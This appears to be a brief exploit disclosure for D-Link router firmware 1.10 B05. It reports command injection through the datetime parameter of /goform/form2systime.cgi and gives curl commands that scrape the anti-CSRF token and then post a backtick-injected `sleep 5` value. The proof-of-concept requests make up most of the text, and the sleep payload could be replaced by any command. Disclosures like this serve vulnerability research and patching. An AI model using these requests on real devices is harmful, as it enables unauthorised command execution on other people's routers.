Vender :D-Link
Firmware version:1.10 B05
Exploit Author: [email protected]
Vendor Homepage:
Hardware Link:
In the handler of route /goform/form2systime.cgi
, the value of parameter datetime
is used in the construction of command date -s "%s"
, which is later fed to system
So it could lead to command injection with crafted request.
There's a random token required by the route, which is used as a mitigation against CSRF. So first we need to get its value:
TOKENID=`curl -s | grep tokenid | head -1 | grep -o 'value="[0-9]*"' | cut -f 2 -d = | tr -d '"'`
Then we could send the crafted parameter along with the token to the route:
curl -i -X POST -d tokenid=$TOKENID -d 'datetime=`sleep 5`-:'